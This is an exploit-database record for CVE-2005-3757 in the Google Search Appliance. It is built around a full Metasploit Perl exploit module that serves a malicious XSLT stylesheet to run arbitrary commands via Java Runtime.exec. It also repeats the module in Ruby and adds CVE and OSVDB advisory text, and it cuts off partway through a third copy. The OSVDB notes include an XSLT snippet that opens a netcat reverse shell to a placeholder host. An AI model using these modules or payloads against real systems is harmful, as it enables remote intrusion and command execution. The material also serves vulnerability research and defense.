Google Search Appliance proxystylesheet XSLT Java Code Execution
2005-11-20T00:00:00
ID EDB-ID:1333 Type exploitdb Reporter H D Moore Modified 2005-11-20T00:00:00
Description
Google Search Appliance proxystylesheet XSLT Java Code Execution. CVE-2005-3757. Remote exploit for hardware platform
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };
my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],
'DisclosureDate' => 'Aug 16 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check {
my $self = shift;
my $s = $self->ConnectSearch;
if (! $s) {
return $self->CheckCode('Connect');
}
my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;
if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine("[*] This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}
if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine("[*] This system appears to be patched");
}
$self->PrintLine("[*] This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit
{
my $self = shift;
my ($s, $page);
# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;
# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
if (! $goog_site || ! $goog_clnt) {
$self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
#$self->PrintLine($page);
#!!! return;
$goog_site = 'test';
$goog_clnt = 'test';
}
# Create the listening local socket that will act as our HTTP server
my $lis = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
if (not defined($lis)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $sel = IO::Select->new($lis);
# Send a search request with our own address in the proxystylesheet parameter
my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
my $proxy =
"http://".
($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
my $url =
"/search?client=". $goog_clnt ."&site=". $goog_site .
"&output=xml_no_dtd&proxystylesheet=". $proxy .
"&q=". $query ."&proxyreload=1";
$self->PrintLine("[*] Sending our malicious search request...");
$s = $self->ConnectSearch || return;
$s->Send("GET $url HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 3);
$s->Close;
$self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
# Did we receive a connection?
my @r = $sel->can_read(30);
if (! @r) {
$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $c = $lis->accept();
if (! $c) {
$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $cli = Msf::Socket::Tcp->new_from_socket($c);
$self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");
$self->ProcessHTTP($cli);
return;
}
sub ConnectSearch {
my $self = shift;
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
return $s;
}
sub ProcessHTTP
{
my $self = shift;
my $cli = shift;
my $targetIdx = $self->GetVar('TARGET');
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $content;
my $rhost;
my $rport;
# Read the first line of the HTTP request
my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
# The way we call Runtime.getRuntime().exec, Java will split
# our string on whitespace. Since we are injecting via XSLT,
# inserting quotes becomes a huge pain, so we do this...
my $exec_str =
'/usr/bin/perl -e system(pack(qq{H*},qq{' .
unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
'}))';
# Load the template from our data section, we have to manually
# seek and reposition to allow the exploit to be used more
# than once without a reload.
seek(DATA, 0, 0);
while(<DATA>) { last if /^__DATA__$/ }
while(<DATA>) { $content .= $_ }
# Insert our command line
$content =~ s/:x:MSF:x:/$exec_str/;
# Send it to the requesting appliance
$rport = $cli->PeerPort;
$rhost = $cli->PeerAddr;
$self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
my $res = "HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;
$self->PrintLine("[*] Sending ".length($res)." bytes...");
$cli->Send($res);
$cli->Close;
}
1;
# milw0rm.com [2005-11-20]
{"id": "EDB-ID:1333", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "description": "Google Search Appliance proxystylesheet XSLT Java Code Execution. CVE-2005-3757. Remote exploit for hardware platform", "published": "2005-11-20T00:00:00", "modified": "2005-11-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1333/", "reporter": "H D Moore", "references": [], "cvelist": ["CVE-2005-3757"], "lastseen": "2016-01-31T14:01:32", "viewCount": 16, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-01-31T14:01:32", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3757"]}, {"type": "osvdb", "idList": ["OSVDB:20981"]}, {"type": "exploitdb", "idList": ["EDB-ID:16907"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82357"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/GOOGLE_PROXYSTYLESHEET_EXEC"]}, {"type": "nessus", "idList": ["GOOGLE_SEARCH_APPLIANCE_PROXYSTYLESHEET.NASL"]}], "modified": "2016-01-31T14:01:32", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/1333/", "sourceData": "##\n# This file is part of the Metasploit Framework and may be redistributed\n# according to the licenses defined in the Authors field below. In the\n# case of an unknown or missing license, this file defaults to the same\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n# version of the Framework can always be obtained from metasploit.com.\n##\n\npackage Msf::Exploit::google_proxystylesheet_exec;\n\nuse strict;\nuse base \"Msf::Exploit\";\nuse Pex::Text;\nuse IO::Socket;\nuse IO::Select;\nmy $advanced = { };\n\nmy $info =\n{\n\t'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\n\t'Version' => '$Revision: 1.1 $',\n\t'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],\n\t\n\t'Description' => \n\t\tPex::Text::Freeform(qq{\n\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\t\tthe Google Search Appliance. This feature allows for arbitrary\n\t\tjava methods to be called. Google released a patch and advisory to \n\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\t\tmust be able to connect back to your machine for this exploit to work.\n\t\t}),\n\t\t\n\t'Arch' => [ ],\n\t'OS' => [ ],\n\t'Priv' => 0,\n\t'UserOpts' => \n\t\t{\n\t\t\t'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],\n\t\t\t'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],\n\t\t\t'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],\n\t\t\t'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', \"0.0.0.0\" ],\n\t\t\t'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],\n\t\t},\n\t'Payload' => \n\t\t{\n\t\t\t'Space' => 1024,\n\t\t\t'Keys' => [ 'cmd' ],\n\t\t},\n\t'Refs' => \n\t\t[\n\t\t\t['OSVDB', 20981],\n\t\t],\n\t'DefaultTarget' => 0,\n\t'Targets' =>\n\t\t[\n\t\t\t[ 'Google Search Appliance']\n\t\t],\n\t'Keys' => [ 'google' ],\n\n\t'DisclosureDate' => 'Aug 16 2005',\n};\n\nsub new\n{\n\tmy $class = shift;\n\tmy $self;\n\t\n\t$self = $class->SUPER::new(\n\t\t\t{ \n\t\t\t\t'Info' => $info,\n\t\t\t\t'Advanced' => $advanced,\n\t\t\t},\n\t\t\t@_);\n\n\treturn $self;\n}\n\nsub Check {\n\tmy $self = shift;\n\tmy $s = $self->ConnectSearch;\n\t\n\tif (! $s) {\n\t\treturn $self->CheckCode('Connect');\n\t}\n\t\n\tmy $url =\n\t\t\"/search?client=\". Pex::Text::AlphaNumText(int(rand(15))+1). \"&\".\n\t\t\"site=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"output=xml_no_dtd&\".\n\t\t\"q=\".Pex::Text::AlphaNumText(int(rand(15))+1).\"&\".\n\t\t\"proxystylesheet=http://\".Pex::Text::AlphaNumText(int(rand(32))+1).\"/\";\n\t\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\tmy $page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\tif ($page =~ /cannot be resolved to an ip address/) {\n\t\t$self->PrintLine(\"[*] This system appears to be vulnerable >:-)\");\n\t\treturn $self->CheckCode('Confirmed');\n\t}\n\t\n\tif ($page =~ /ERROR: Unable to fetch the stylesheet/) {\n\t\t$self->PrintLine(\"[*] This system appears to be patched\");\n\t}\n\t\n\t$self->PrintLine(\"[*] This system does not appear to be vulnerable\");\n\treturn $self->CheckCode('Safe');\t\n}\n\n\nsub Exploit\n{\n\tmy $self = shift;\n\tmy ($s, $page);\n\t\n\t# Request the index page to obtain a redirect response\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 5);\n\t$s->Close;\n\n\t# Parse the redirect to get the client and site values\n\tmy ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im;\n\tif (! $goog_site || ! $goog_clnt) {\n\t\t$self->PrintLine(\"[*] Invalid response to our request, is this a Google appliance?\");\n\t\t#$self->PrintLine($page);\n\t\t#!!! return;\n\t\t$goog_site = 'test';\n\t\t$goog_clnt = 'test';\n\t}\n\n\t# Create the listening local socket that will act as our HTTP server\n\tmy $lis = IO::Socket::INET->new(\n\t\t\tLocalHost => $self->GetVar('HTTPHOST'),\n\t\t\tLocalPort => $self->GetVar('HTTPPORT'),\n\t\t\tReuseAddr => 1,\n\t\t\tListen => 1,\n\t\t\tProto => 'tcp');\n\t\n\tif (not defined($lis)) {\n\t\t$self->PrintLine(\"[-] Failed to create local HTTP listener on \" . $self->GetVar('HTTPPORT'));\n\t\treturn;\n\t}\n\tmy $sel = IO::Select->new($lis);\n\t\n\t# Send a search request with our own address in the proxystylesheet parameter\n\tmy $query = Pex::Text::AlphaNumText(int(rand(32))+1);\n\t\n\tmy $proxy =\n\t\t\"http://\".\n\t\t($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).\n\t\t\":\".$self->GetVar('HTTPPORT').\"/\".Pex::Text::AlphaNumText(int(rand(15))+1).\".xsl\";\n\t\n\tmy $url = \n\t\t\"/search?client=\". $goog_clnt .\"&site=\". $goog_site .\n\t\t\"&output=xml_no_dtd&proxystylesheet=\". $proxy .\n\t\t\"&q=\". $query .\"&proxyreload=1\";\n\n\t$self->PrintLine(\"[*] Sending our malicious search request...\");\n\t$s = $self->ConnectSearch || return;\n\t$s->Send(\"GET $url HTTP/1.0\\r\\n\\r\\n\");\n\t$page = $s->Recv(-1, 3);\n\t$s->Close;\n\n\t$self->PrintLine(\"[*] Listening for connections to http://\" . $self->GetVar('HTTPHOST') . \":\" . $self->GetVar('HTTPPORT') . \" ...\");\n\t\n\t# Did we receive a connection?\n\tmy @r = $sel->can_read(30);\n\t\n\tif (! @r) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\n\t}\n\n\tmy $c = $lis->accept();\n\tif (! $c) {\n\t\t$self->PrintLine(\"[*] No connection received from the search engine, possibly patched.\");\n\t\t$lis->close;\n\t\treturn;\t\n\t}\n\n\tmy $cli = Msf::Socket::Tcp->new_from_socket($c);\n\t$self->PrintLine(\"[*] Connection received from \".$cli->PeerAddr.\"...\");\t\n\t$self->ProcessHTTP($cli);\n\treturn;\n}\n\nsub ConnectSearch {\n\tmy $self = shift;\n\tmy $s = Msf::Socket::Tcp->new(\n\t\t'PeerAddr' => $self->GetVar('RHOST'),\n\t\t'PeerPort' => $self->GetVar('RPORT'),\n\t\t'SSL' => $self->GetVar('SSL')\n\t);\n\t\n\tif ($s->IsError) {\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\t\treturn;\n\t}\n\treturn $s;\n}\n\nsub ProcessHTTP\n{\n\tmy $self = shift;\n\tmy $cli = shift;\n\tmy $targetIdx = $self->GetVar('TARGET');\n\tmy $target = $self->Targets->[$targetIdx];\n\tmy $ret = $target->[1];\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\n\tmy $content;\n\tmy $rhost;\n\tmy $rport;\n\n\t# Read the first line of the HTTP request\n\tmy ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));\n\n\t# The way we call Runtime.getRuntime().exec, Java will split\n\t# our string on whitespace. Since we are injecting via XSLT,\n\t# inserting quotes becomes a huge pain, so we do this...\n\tmy $exec_str = \n\t\t'/usr/bin/perl -e system(pack(qq{H*},qq{' .\n\t\tunpack(\"H*\", $self->GetVar('EncodedPayload')->RawPayload).\n\t\t'}))';\n\n\t# Load the template from our data section, we have to manually\n\t# seek and reposition to allow the exploit to be used more\n\t# than once without a reload.\n\tseek(DATA, 0, 0);\n\twhile(<DATA>) { last if /^__DATA__$/ }\n\twhile(<DATA>) {\t$content .= $_ }\n\n\t# Insert our command line\n\t$content =~ s/:x:MSF:x:/$exec_str/;\n\t\n\t# Send it to the requesting appliance\n\t$rport = $cli->PeerPort;\n\t$rhost = $cli->PeerAddr;\n\t$self->PrintLine(\"[*] HTTP Client connected from $rhost, sending XSLT...\");\n\t\n\tmy $res = \"HTTP/1.1 200 OK\\r\\n\" .\n\t \"Content-Type: text/html\\r\\n\" .\n\t \"Content-Length: \" . length($content) . \"\\r\\n\" .\n\t \"Connection: close\\r\\n\" .\n\t \"\\r\\n\" .\n\t $content;\n\n\t$self->PrintLine(\"[*] Sending \".length($res).\" bytes...\");\n\t$cli->Send($res);\n\t$cli->Close;\n}\n\n1;\n\n# milw0rm.com [2005-11-20]\n", "osvdbidlist": ["20981"]}
{"cve": [{"lastseen": "2020-10-03T11:34:57", "description": "The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.", "edition": 3, "cvss3": {}, "published": "2005-11-22T21:03:00", "title": "CVE-2005-3757", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-3757"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/h:google:search_appliance:*", "cpe:/h:google:mini_search_appliance:*"], "id": "CVE-2005-3757", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3757", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:google:search_appliance:*:*:*:*:*:*:*:*", "cpe:2.3:h:google:mini_search_appliance:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:03", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82357", "href": "https://packetstormsecurity.com/files/82357/Google-Appliance-ProxyStyleSheet-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Appliance ProxyStyleSheet Command Execution', \n'Description' => %q{ \nThis module exploits a feature in the Saxon XSLT parser used by \nthe Google Search Appliance. This feature allows for arbitrary \njava methods to be called. Google released a patch and advisory to \ntheir client base in August of 2005 (GA-2005-08-m). The target appliance \nmust be able to connect back to your machine for this exploit to work. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2005-3757'], \n['OSVDB', '20981'], \n['BID', '15509'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 4000, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl bash telnet netcat-e', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Aug 16 2005', \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DefaultTarget' => 0)) \nend \n \n# Handle incoming requests from the appliance \ndef on_request_uri(cli, request) \n \nprint_status(\"Handling new incoming HTTP request...\") \n \npath = File.join(Msf::Config.install_root, \"data\", \"exploits\", \"google_proxystylesheet.xml\") \n \nfd = File.open(path, \"r\") \ndata = fd.read \nfd.close \n \nexec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))' \ndata.gsub!(/:x:MSF:x:/, exec_str) \nsend_response(cli, data) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => '/search', \n'vars_get' => \n{ \n'client' => rand_text_alpha(rand(15)+1), \n'site' => rand_text_alpha(rand(15)+1), \n'output' => 'xml_no_dtd', \n'q' => rand_text_alpha(rand(15)+1), \n'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/' \n} \n}, 10) \n \nif (res and res.body =~ /cannot be resolved to an ip address/) \nprint_status(\"This system appears to be vulnerable\") \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) \nprint_status(\"This system appears to be patched\") \nend \n \nprint_status(\"This system is not exploitable\") \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef exploit \n \nprint_status(\"Obtaining the appliance site and client IDs...\") \n# Send a HTTP/1.0 request to learn the site configuration \nres = send_request_raw({ \n'uri' => '/', \n'version' => '1.0' \n}, 10) \n \nif !(res and res['location'] and res['location'] =~ /site=/) \nprint_status(\"Could not read the location header: #{res.code} #{res.message}\") \nreturn \nend \n \nm = res['location'].match(/site=([^\\&]+)\\&.*client=([^\\&]+)\\&/im) \nif !(m and m[1] and m[2]) \nprint_status(\"Invalid location header: #{res['location']}\") \nreturn \nend \n \nprint_status(\"Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...\") \nstart_service \n \nprint_status(\"Requesting a search using our custom XSLT...\") \nres = send_request_cgi({ \n'uri' => '/search', \n'vars_get' => \n{ \n'client' => m[2], \n'site' => m[1], \n'output' => 'xml_no_dtd', \n'q' => rand_text_alpha(rand(15)+1), \n'proxystylesheet' => \"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml\", \n'proxyreload' => '1' \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \nprint_status(\"Waiting on the payload to execute...\") \nsleep(20) \nelse \nprint_status(\"No response from the server\") \nend \n \nprint_status(\"Shutting down the web service...\") \nstop_service \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82357/google_proxystylesheet_exec.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3757"], "edition": 1, "description": "## Vulnerability Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Solution Description\nUpgrade to the version specified by Google advisory GA-2005-08-m, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Google Search Appliance contains a flaw that allows a remote attacker to execute arbitrary Java methods as an unprivileged user. The issue is due to the proxystylesheet parameter in the search request, which loads an external XSLT style sheet from a URL. The XSLT parser is based on Saxon, which allows Java method calls from within an XSLT document. This allows an attacker to execute arbitrary code and commands on the appliance.\n## Manual Testing Notes\nReplace the proxystylesheet variable in the search URL with a URL to a malicious XSLT style sheet. This style sheet should contain a block like:\n\n<!-- Google Appliance Remote Shell ;-) -->\n\nXSLT Version: <xsl:value-of select=\"system-property('xsl:version')\"/> <br />\nXSLT Vendor: <xsl:value-of select=\"system-property('xsl:vendor')\" /> <br />\nXSLT URL: <xsl:value-of select=\"system-property('xsl:vendor-url')\" /> <br />\nOS: <xsl:value-of select=\"sys:getProperty('os.name')\" /> <br />\nVersion: <xsl:value-of select=\"sys:getProperty('os.version')\" /> <br />\nArch: <xsl:value-of select=\"sys:getProperty('os.arch')\" /> <br />\nUserName: <xsl:value-of select=\"sys:getProperty('user.name')\" /> <br />\nUserHome: <xsl:value-of select=\"sys:getProperty('user.home')\" /> <br />\nUserDir: <xsl:value-of select=\"sys:getProperty('user.dir')\" /> <br />\n\nExecuting command...<br />\n<xsl:value-of select=\"run:exec(run:getRuntime(), 'sh -c nc$255.255.255.255$53|sh|nc$255.255.255.255$53')\" />\n\n<xsl:text disable-output-escaping=\"yes\">\n## References:\nSecurity Tracker: 1015246\n[Secunia Advisory ID:17644](https://secuniaresearch.flexerasoftware.com/advisories/17644/)\n[Related OSVDB ID: 20979](https://vulners.com/osvdb/OSVDB:20979)\n[Related OSVDB ID: 20980](https://vulners.com/osvdb/OSVDB:20980)\n[Related OSVDB ID: 20978](https://vulners.com/osvdb/OSVDB:20978)\n[Related OSVDB ID: 20977](https://vulners.com/osvdb/OSVDB:20977)\nOther Advisory URL: http://metasploit.com/research/vulns/google_proxystylesheet/\nNews Article: http://www.techworld.com/networking/news/index.cfm?NewsID=4840\nNews Article: http://www.webpronews.com/insiderreports/searchinsider/wpn-49-20051122GoogleMiniNeededBigSecurityPatch.html\nNews Article: http://news.techwhack.com/2526/221129-google-fixes-security-flaws-in-google-mini/\nNews Article: http://www.eweek.com/article2/0,1895,1891796,00.asp\nGeneric Exploit URL: http://metasploit.com/projects/Framework/link.php?type=exploit&vers=2&name=google_proxystylesheet_exec\nFrSIRT Advisory: ADV-2005-2500\n[CVE-2005-3757](https://vulners.com/cve/CVE-2005-3757)\nBugtraq ID: 15509\n", "modified": "2005-11-21T00:00:00", "published": "2005-11-21T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:20981", "id": "OSVDB:20981", "title": "Google Search Appliance proxystylesheet XSLT Java Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:47:39", "description": "Google Appliance ProxyStyleSheet Command Execution. CVE-2005-3757. Webapps exploit for hardware platform", "published": "2010-07-01T00:00:00", "type": "exploitdb", "title": "Google Appliance ProxyStyleSheet Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3757"], "modified": "2010-07-01T00:00:00", "id": "EDB-ID:16907", "href": "https://www.exploit-db.com/exploits/16907/", "sourceData": "##\r\n# $Id: google_proxystylesheet_exec.rb 9653 2010-07-01 23:33:07Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::HttpServer\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Google Appliance ProxyStyleSheet Command Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\r\n\t\t\tthe Google Search Appliance. This feature allows for arbitrary\r\n\t\t\tjava methods to be called. Google released a patch and advisory to\r\n\t\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\r\n\t\t\tmust be able to connect back to your machine for this exploit to work.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9653 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2005-3757'],\r\n\t\t\t\t\t['OSVDB', '20981'],\r\n\t\t\t\t\t['BID', '15509'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 4000,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl bash telnet netcat-e',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DisclosureDate' => 'Aug 16 2005',\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\t# Handle incoming requests from the appliance\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status(\"Handling new incoming HTTP request...\")\r\n\r\n\t\texec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack(\"H*\")[0] + '}))'\r\n\t\tdata = @xml_data.gsub(/:x:MSF:x:/, exec_str)\r\n\t\tsend_response(cli, data)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/search',\r\n\t\t\t'vars_get' =>\r\n\t\t\t{\r\n\t\t\t\t'client' => rand_text_alpha(rand(15)+1),\r\n\t\t\t\t'site' => 